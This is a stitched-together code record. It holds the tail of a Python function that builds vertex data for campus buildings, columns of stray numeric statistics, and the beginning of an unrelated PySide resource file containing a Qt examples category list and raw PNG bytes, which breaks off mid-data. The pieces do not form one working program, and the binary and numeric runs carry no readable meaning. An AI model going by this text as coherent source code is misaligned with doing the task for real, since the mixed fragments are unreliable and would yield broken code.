list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.65)
i += 1
# labir tengah
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.6)
i += 1
# belakang perpus
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.7)
i += 1
# belakang pau
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.7)
i += 1
# jalanan
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.2)
i += 1
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.2)
i += 1
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.2)
i += 1
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.2)
i += 1
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.2)
i += 1
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.2)
i += 1
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.2)
i += 1
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.2)
i += 1
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.2)
i += 1
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.2)
i += 1
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.2)
i += 1
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.2)
i += 1
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.2)
i += 1
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.2)
i += 1
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.2)
i += 1
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.2)
i += 1
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.2)
i += 1
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.2)
i += 1
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.2)
i += 1
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.2)
i += 1
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.2)
i += 1
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.2)
i += 1
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.2)
i += 1
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.2)
i += 1
vertex_data += createBuilding(list_of_gedung[i][0][0], list_of_gedung[i][0][1], list_of_gedung[i][0][2],
list_of_gedung[i][1][0], list_of_gedung[i][1][1], list_of_gedung[i][1][2],
list_of_gedung[i][2][0], list_of_gedung[i][2][1], list_of_gedung[i][2][2],
list_of_gedung[i][3][0], list_of_gedung[i][3][1], list_of_gedung[i][3][2], 0.2)
return vertex_data
| 62.894614
| 455
| 0.570413
| 4,255
| 26,856
| 3.289777
| 0.019271
| 0.23189
| 0.463781
| 0.5015
| 0.947778
| 0.947778
| 0.944635
| 0.941635
| 0.941635
| 0.941635
| 0
| 0.06267
| 0.259085
| 26,856
| 426
| 456
| 63.042254
| 0.640818
| 0.012772
| 0
| 0.932394
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008451
| false
| 0
| 0
| 0
| 0.016901
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
d49ed76bbf38c7c2f37da6369219140f14930f8a
| 77,752
|
py
|
Python
|
Controls/env/Lib/site-packages/PySide/examples/tools/qtdemo/qtdemo_rc.py
|
LoicBoileau/Projet-S4---Robot-Delta
|
0de0768e2609c18fbf060eb6726150a99080db1c
|
[
"MIT"
] | 32
|
2015-11-06T02:59:41.000Z
|
2021-02-12T02:44:42.000Z
|
Controls/env/Lib/site-packages/PySide/examples/tools/qtdemo/qtdemo_rc.py
|
LoicBoileau/Projet-S4---Robot-Delta
|
0de0768e2609c18fbf060eb6726150a99080db1c
|
[
"MIT"
] | 56
|
2020-01-15T15:44:40.000Z
|
2021-11-15T17:50:24.000Z
|
python/Lib/site-packages/PySide/examples/tools/qtdemo/qtdemo_rc.py
|
jfveronelli/sqink
|
5e9e6bc6c5c6c00abbc07099bc1fa1ab6cf79577
|
[
"Unlicense"
] | 4
|
2016-02-01T09:15:05.000Z
|
2020-04-30T03:41:04.000Z
|
# -*- coding: utf-8 -*-
# Resource object code
#
# Created: st 14. 10 21:40:06 2015
# by: The Resource Compiler for PySide (Qt v4.8.7)
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore
qt_resource_data = b"\x00\x00\x1e\xe9<?xml version=\x221.0\x22 encoding=\x22iso-8859-1\x22?>\x0d\x0a<categories>\x0d\x0a <category dirname=\x22designer\x22 name=\x22Qt Designer\x22>\x0d\x0a <example filename=\x22calculatorbuilder\x22 name=\x22Calculator Builder\x22 />\x0d\x0a <example filename=\x22calculatorform\x22 name=\x22Calculator Form\x22 />\x0d\x0a <example filename=\x22containerextension\x22 name=\x22Container Extension\x22 />\x0d\x0a <example filename=\x22plugins\x22 name=\x22Custom Widget Plugins\x22 />\x0d\x0a <example filename=\x22taskmenuextension\x22 name=\x22Task Menu Extension\x22 />\x0d\x0a <example filename=\x22worldtimeclockbuilder\x22 name=\x22World Time Clock Builder\x22 />\x0d\x0a <example filename=\x22worldtimeclockplugin\x22 name=\x22World Time Clock Plugin\x22 />\x0d\x0a </category>\x0d\x0a <category dirname=\x22desktop\x22 name=\x22Desktop\x22>\x0d\x0a <example filename=\x22systray\x22 name=\x22System Tray\x22 />\x0d\x0a </category>\x0d\x0a <category dirname=\x22dialogs\x22 name=\x22Dialogs\x22>\x0d\x0a <example filename=\x22complexwizard\x22 name=\x22Complex Wizard\x22 />\x0d\x0a <example filename=\x22configdialog\x22 name=\x22Configuration Dialog\x22 />\x0d\x0a <example filename=\x22extension\x22 name=\x22Extension Dialog\x22 />\x0d\x0a <example filename=\x22findfiles\x22 name=\x22Find Files Dialog\x22 />\x0d\x0a <example filename=\x22simplewizard\x22 name=\x22Simple Wizard\x22 />\x0d\x0a <example filename=\x22standarddialogs\x22 name=\x22Standard Dialogs\x22 />\x0d\x0a <example filename=\x22tabdialog\x22 name=\x22Tab Dialog\x22 />\x0d\x0a </category>\x0d\x0a <category dirname=\x22draganddrop\x22 name=\x22Drag and Drop\x22>\x0d\x0a <example filename=\x22draggableicons\x22 name=\x22Draggable Icons\x22 />\x0d\x0a <example filename=\x22draggabletext\x22 name=\x22Draggable Text\x22 />\x0d\x0a <example filename=\x22dropsite\x22 name=\x22Drop Site\x22 />\x0d\x0a <example filename=\x22fridgemagnets\x22 name=\x22Fridge Magnets\x22 />\x0d\x0a <example filename=\x22puzzle\x22 name=\x22Puzzle\x22 />\x0d\x0a </category>\x0d\x0a <category dirname=\x22graphicsview\x22 name=\x22Graphics View\x22>\x0d\x0a <example filename=\x22elasticnodes\x22 name=\x22Elastic Nodes\x22 />\x0d\x0a <example filename=\x22collidingmice\x22 name=\x22Colliding Mice\x22 />\x0d\x0a <example filename=\x22diagramscene\x22 name=\x22Diagram Scene\x22 />\x0d\x0a <example filename=\x22dragdroprobot\x22 name=\x22Drag and Drop Robot\x22 />\x0d\x0a <example filename=\x22portedcanvas\x22 name=\x22Ported Canvas\x22 />\x0d\x0a <example filename=\x22portedasteroids\x22 name=\x22Ported Asteroids\x22 />\x0d\x0a </category>\x0d\x0a <category dirname=\x22itemviews\x22 name=\x22Item Views\x22>\x0d\x0a <example filename=\x22basicsortfiltermodel\x22 name=\x22Basic Sort/Filter Model\x22 />\x0d\x0a <example filename=\x22chart\x22 name=\x22Chart\x22 />\x0d\x0a <example filename=\x22dirview\x22 name=\x22Directory View\x22 />\x0d\x0a <example filename=\x22pixelator\x22 name=\x22Pixelator\x22 />\x0d\x0a <example filename=\x22puzzle\x22 name=\x22Puzzle\x22 />\x0d\x0a <example filename=\x22simpledommodel\x22 name=\x22Simple DOM Model\x22 />\x0d\x0a <example filename=\x22simpletreemodel\x22 name=\x22Simple Tree Model\x22 />\x0d\x0a <example filename=\x22spinboxdelegate\x22 name=\x22Spin Box Delegate\x22 />\x0d\x0a </category>\x0d\x0a <category dirname=\x22layouts\x22 name=\x22Layouts\x22>\x0d\x0a <example filename=\x22basiclayouts\x22 name=\x22Basic Layouts\x22 />\x0d\x0a <example filename=\x22borderlayout\x22 name=\x22Border Layout\x22 />\x0d\x0a <example filename=\x22flowlayout\x22 name=\x22Flow Layout\x22 />\x0d\x0a </category>\x0d\x0a <category dirname=\x22linguist\x22 name=\x22Qt Linguist\x22>\x0d\x0a <example filename=\x22arrowpad\x22 name=\x22Arrow Pad\x22 />\x0d\x0a <example filename=\x22hellotr\x22 name=\x22Hello World\x22 />\x0d\x0a <example filename=\x22trollprint\x22 name=\x22Troll Print\x22 />\x0d\x0a </category>\x0d\x0a <category dirname=\x22mainwindows\x22 name=\x22Main Windows\x22>\x0d\x0a <example filename=\x22application\x22 name=\x22Application\x22 />\x0d\x0a <example filename=\x22dockwidgets\x22 name=\x22Dock Widgets\x22 />\x0d\x0a <example filename=\x22mdi\x22 name=\x22Multiple Document Interface\x22 />\x0d\x0a <example filename=\x22menus\x22 name=\x22Menus\x22 />\x0d\x0a <example filename=\x22recentfiles\x22 name=\x22Recent Files\x22 />\x0d\x0a <example filename=\x22sdi\x22 name=\x22Single Document Interface\x22 />\x0d\x0a </category>\x0d\x0a <category dirname=\x22network\x22 name=\x22Networking\x22>\x0d\x0a <example filename=\x22blockingfortuneclient\x22 name=\x22Blocking Fortune Client\x22 />\x0d\x0a <example filename=\x22broadcastreceiver\x22 name=\x22Broadcast Receiver\x22 />\x0d\x0a <example filename=\x22broadcastsender\x22 name=\x22Broadcast Sender\x22 />\x0d\x0a <example filename=\x22fortuneclient\x22 name=\x22Fortune Client\x22 />\x0d\x0a <example filename=\x22fortuneserver\x22 name=\x22Fortune Server\x22 />\x0d\x0a <example filename=\x22ftp\x22 changedirectory=\x22false\x22 name=\x22FTP Client\x22 />\x0d\x0a <example filename=\x22http\x22 changedirectory=\x22false\x22 name=\x22HTTP Client\x22 />\x0d\x0a <example filename=\x22loopback\x22 name=\x22Loopback\x22 />\x0d\x0a <example filename=\x22threadedfortuneserver\x22 name=\x22Threaded Fortune Server\x22 />\x0d\x0a <example filename=\x22torrent\x22 name=\x22Torrent Client\x22 />\x0d\x0a </category>\x0d\x0a <category dirname=\x22opengl\x22 name=\x22OpenGL\x22>\x0d\x0a <example filename=\x222dpainting\x22 name=\x222D Painting\x22 />\x0d\x0a <example filename=\x22grabber\x22 name=\x22Grabber\x22 />\x0d\x0a <example filename=\x22hellogl\x22 name=\x22Hello GL\x22 />\x0d\x0a <example filename=\x22overpainting\x22 name=\x22Overpainting\x22 />\x0d\x0a <example filename=\x22pbuffers\x22 name=\x22Pixel Buffers\x22 />\x0d\x0a <example filename=\x22samplebuffers\x22 name=\x22Sample Buffers\x22 />\x0d\x0a <example filename=\x22textures\x22 name=\x22Textures\x22 />\x0d\x0a </category>\x0d\x0a <category dirname=\x22painting\x22 name=\x22Painting\x22>\x0d\x0a <example filename=\x22basicdrawing\x22 name=\x22Basic Drawing\x22 />\x0d\x0a <example filename=\x22concentriccircles\x22 name=\x22Concentric Circles\x22 />\x0d\x0a <example filename=\x22painterpaths\x22 name=\x22Painter Paths\x22 />\x0d\x0a <example filename=\x22transformations\x22 name=\x22Transformations\x22 />\x0d\x0a <example filename=\x22svgviewer\x22 name=\x22SVG Viewer\x22 />\x0d\x0a </category>\x0d\x0a <category dirname=\x22phonon\x22 name=\x22Phonon\x22>\x0d\x0a <example filename=\x22capabilities\x22 name=\x22Backend Capabilities\x22 />\x0d\x0a <example filename=\x22musicplayer\x22 name=\x22Music Player\x22 />\x0d\x0a </category>\x0d\x0a <category dirname=\x22richtext\x22 name=\x22Rich Text\x22>\x0d\x0a <example filename=\x22calendar\x22 name=\x22Calendar\x22 />\x0d\x0a <example filename=\x22orderform\x22 name=\x22Order Form\x22 />\x0d\x0a <example filename=\x22syntaxhighlighter\x22 name=\x22Syntax Highlighter\x22 />\x0d\x0a </category>\x0d\x0a <category dirname=\x22sql\x22 name=\x22SQL\x22>\x0d\x0a <example filename=\x22cachedtable\x22 name=\x22Cached Table\x22 />\x0d\x0a <example filename=\x22querymodel\x22 name=\x22Query Model\x22 />\x0d\x0a <example filename=\x22relationaltablemodel\x22 name=\x22Relational Table Model\x22 />\x0d\x0a <example filename=\x22tablemodel\x22 name=\x22Table Model\x22 />\x0d\x0a </category>\x0d\x0a <category dirname=\x22threads\x22 name=\x22Threading\x22>\x0d\x0a <example filename=\x22mandelbrot\x22 name=\x22Mandelbrot\x22 />\x0d\x0a <example filename=\x22semaphores\x22 name=\x22Semaphores\x22 executable=\x22false\x22 />\x0d\x0a <example filename=\x22waitconditions\x22 name=\x22Wait Conditions\x22 executable=\x22false\x22 />\x0d\x0a </category>\x0d\x0a <category dirname=\x22tools\x22 name=\x22Tools\x22>\x0d\x0a <example filename=\x22codecs\x22 name=\x22Codecs\x22 />\x0d\x0a <example filename=\x22i18n\x22 name=\x22Internationalization\x22 />\x0d\x0a <example filename=\x22plugandpaint\x22 name=\x22Plug and Paint\x22 />\x0d\x0a <example filename=\x22qtdemo\x22 name=\x22Qt Demo\x22 executable=\x22false\x22 />\x0d\x0a <example filename=\x22regexp\x22 name=\x22Regular Expressions\x22 />\x0d\x0a <example filename=\x22settingseditor\x22 name=\x22Settings Editor\x22 />\x0d\x0a </category>\x0d\x0a <category dirname=\x22widgets\x22 name=\x22Widgets\x22>\x0d\x0a <example filename=\x22analogclock\x22 name=\x22Analog Clock\x22 />\x0d\x0a <example filename=\x22calculator\x22 name=\x22Calculator\x22 />\x0d\x0a <example filename=\x22charactermap\x22 name=\x22Character Map\x22 />\x0d\x0a <example filename=\x22digitalclock\x22 name=\x22Digital Clock\x22 />\x0d\x0a <example filename=\x22groupbox\x22 name=\x22Group Box\x22 />\x0d\x0a <example filename=\x22icons\x22 name=\x22Icons\x22 />\x0d\x0a <example filename=\x22imageviewer\x22 name=\x22Image Viewer\x22 />\x0d\x0a <example filename=\x22lineedits\x22 name=\x22Line Edits\x22 />\x0d\x0a <example filename=\x22movie\x22 name=\x22Movie Player\x22 />\x0d\x0a <example filename=\x22screenshot\x22 name=\x22Screenshot\x22 />\x0d\x0a <example filename=\x22scribble\x22 name=\x22Scribble\x22 />\x0d\x0a <example filename=\x22shapedclock\x22 name=\x22Shaped Clock\x22 />\x0d\x0a <example filename=\x22sliders\x22 name=\x22Sliders\x22 />\x0d\x0a <example filename=\x22spinboxes\x22 name=\x22Spin Boxes\x22 />\x0d\x0a <example filename=\x22styles\x22 name=\x22Styles\x22 />\x0d\x0a <example filename=\x22tetrix\x22 name=\x22Tetrix\x22 />\x0d\x0a <example filename=\x22tooltips\x22 name=\x22Tool Tips\x22 />\x0d\x0a <example filename=\x22wiggly\x22 name=\x22Wiggly\x22 />\x0d\x0a <example filename=\x22windowflags\x22 name=\x22Window Flags\x22 />\x0d\x0a </category>\x0d\x0a <category dirname=\x22xml\x22 name=\x22XML\x22>\x0d\x0a <example filename=\x22saxbookmarks\x22 name=\x22SAX Bookmarks\x22 />\x0d\x0a <example filename=\x22dombookmarks\x22 name=\x22DOM Bookmarks\x22 />\x0d\x0a </category>\x0d\x0a</categories>\x0d\x0a\x00\x00\x03a<?xml version=\x221.0\x22 encoding=\x22iso-8859-1\x22?>\x0d\x0a<categories>\x0d\x0a <category dirname=\x22.\x22 docname=\x22demos\x22 name=\x22Demonstrations\x22>\x0d\x0a <example filename=\x22affine\x22 name=\x22Affine Transformations\x22 />\x0d\x0a <example filename=\x22arthurplugin\x22 name=\x22Arthur Plugin\x22 />\x0d\x0a <example filename=\x22composition\x22 name=\x22Composition Modes\x22 />\x0d\x0a <example filename=\x22gradients\x22 name=\x22Gradients\x22 />\x0d\x0a <example filename=\x22pathstroke\x22 name=\x22Path Stroking\x22 />\x0d\x0a <example filename=\x22deform\x22 name=\x22Vector Deformation\x22 />\x0d\x0a <example filename=\x22books\x22 name=\x22Books\x22 />\x0d\x0a <example filename=\x22mainwindow\x22 name=\x22Main Window\x22 />\x0d\x0a <example filename=\x22spreadsheet\x22 name=\x22Spreadsheet\x22 />\x0d\x0a <example filename=\x22sqlbrowser\x22 name=\x22SQL Browser\x22 />\x0d\x0a <example filename=\x22textedit\x22 name=\x22Text Edit\x22 />\x0d\x0a <example filename=\x22embeddeddialogs\x22 name=\x22Embedded Dialogs\x22 />\x0d\x0a </category>\x0d\x0a</categories>\x0d\x0a\x00\x00*\x14\x89PNG\x0d\x0a\x1a\x0a\x00\x00\x00\x0dIHDR\x00\x00\x00\x80\x00\x00\x00\x80\x08\x06\x00\x00\x00\xc3>a\xcb\x00\x00\x00\x09pHYs\x00\x00.#\x00\x00.#\x01x\xa5?v\x00\x00\x00\x07tIME\x07\xd5\x08\x08\x0f\x1b6\x163],\x00\x00\x00\x1dtEXtComment\x00Created with The GIMP\xefd%n\x00\x00)\x8aIDATx\xda\xed\x9dy\xbc\x1ce\x99\xef\xbfoUu\xf79}6\xc8N\x16\xb3\x02a\x0b!\x91M\x10FQ\x84\xcf\x04\x17d\x9c\xc5\x91\xeb2^\x9d\xe5\xc3utD\xe7\x08n(\xc28W\xc7\xab3#*\xf7\x8e\xeb\x8c\xa023\xa0\xa0(\x12\x08;$!\x84\x84l\x90\x04\xb2\x9d\xacg\xe9\xa5\xba\xaa\xde\xf7\xfeQK\xbf\xb5\xf5\x09!!'\x87SP\xe9\xee\xaa>]\xdd\xf5\xfc\x9e\xdf\xb3\xbe\xef+8\x94m\x09\xa7_wk\xf1\xc9r\x97X\x01,\x05\xee\x07\x96\xf7\x96\xed>\xc6\xb6cj\x13\x87 |\x80\xc7?}K\xf1\xec\xee\xe3c\x7f>\x08\xac\x0d\x00\xb1\x14x\x18\x18\xe8-\xdb\xde\xd8m\x1e]\x00\xb8\x1c\xf8\xd5\xa7o)\x92\x00@\xd6\xf6,\xb0,\x04Do\xd9\xde2v\xcb\x8fe\x00,\xa1#\x10\xe8\xc2\x83\x04\x80\xbe9\xc0\x0b\x09\x86\xd8\xde[\xb6\xed11\x1c\xbd\xcdz\x99\xef\xff\x00\xb0\xf0\x10\xafU\x00N\x0a\xf6\x0f\x07\xc7\xb6\xdeX-=\xa2\x81b}o\xd9v\xc7\xc42\x12\x19`\x09\xe5\x80\xd2g\x01\x1c\x02\x03\x1c\xcc\xb6#`\x98\xe5\x81c\xb9\xaa\xb7lW\xc7\xc442\x18\xe0\xcb\xa1\xf0\x8f\xe0v\x02\xf0G\xc1\x0e\xb0\xff\xc6j\xe9\x09-\xd2X\xdd[\xb6\x07\xc6\xc4\xf6j3\xc0\x12\xa6\x02\xeb\x81\x8e\xf0\xd0\x11b\x80\xe1\xb6\xbd\xc0\x0a\x8d!\x96\xf5\x96\xed\xc111\x1ey\x00\xdc\x19\x05\x80-\x00P\x10\x02O)\xe4\xab\xf7\xfd\xdd\x00\x0c\xa1\x0f\xf1To\xd9\xde9&\xd6\xc3\x09\x80%\x9c\x03<\x944\x17y\x0c0\xbfPf\x9ci\x01\x8a~\xe9\xe1*\xc9\x01\xe9\xd1P\x92\x01)\x91(\xd4\x91\xfb=C\xc0s\x1aC,\x05\xfa\xc6\x1c\xcbW\x06\x80\x07\x81\x0b\x93\x87\xb3\x00P\x14\x06\x17\xb4\x8d\xc3@A$h\x15\xec\xfe\xf3\x9a\xf2\xa8+I\xbf\xf4\xa8H\x8f\x9aR\x0cI\xefH\xb2\xc6Z-\x17\xf1Ho\xd9~~L\xec\x07\x0b\x80%\xfc\x11\xf0\xd3\xac\xf7e\x01\xe0\x04\xb3\x9d\xd3\x8a=1\x81\xfb@P\x89\xe7\xf1s\x1e\x8a\xaa\x94T\x94\xc7\x01\xcfcPy\xd8J\xe1\xa8\xc3\xce\x15\x0d\xe0\xc5\x80!~\x1f\x80\xe2\xf9\xde\xb2]\x1f\x03@v\xd8\xb7\x0a\x98\x9bu:\x0b\x00\xb3\xac.N,\xf4d\x08\x9e\x83\x00E\xf3\xbcB\xe1*\x85\x8dd(`\x8aA%\xd9\xefyG\xc2|l\x05\x1e\xd7L\xc6\xb3\xbde[\xbdV\x00\xd0*\x0c\xbc&O\xf8y[\xb7\xd1\x86\xc0\xd2h?.t]\xd8B\x03\x85H\x9dS\x14\x84\xa2\x80\xa2\xd3,\x80\xd9<WU\x1e\x15\xe9\xfb\x15\x07\xa4GM\xfa\x0c\xf2\x0a\xb6\xd7\x05\xfbU\xc1\xeb=7VK+\x02@\xdc\x0f<3\x9a#\x0d\x91\xa3\xfd\x13\x80g\x80)y\x7f\x98\xc5\x00g\x15O`\x92\xd9\x91\xab\xe9Y& 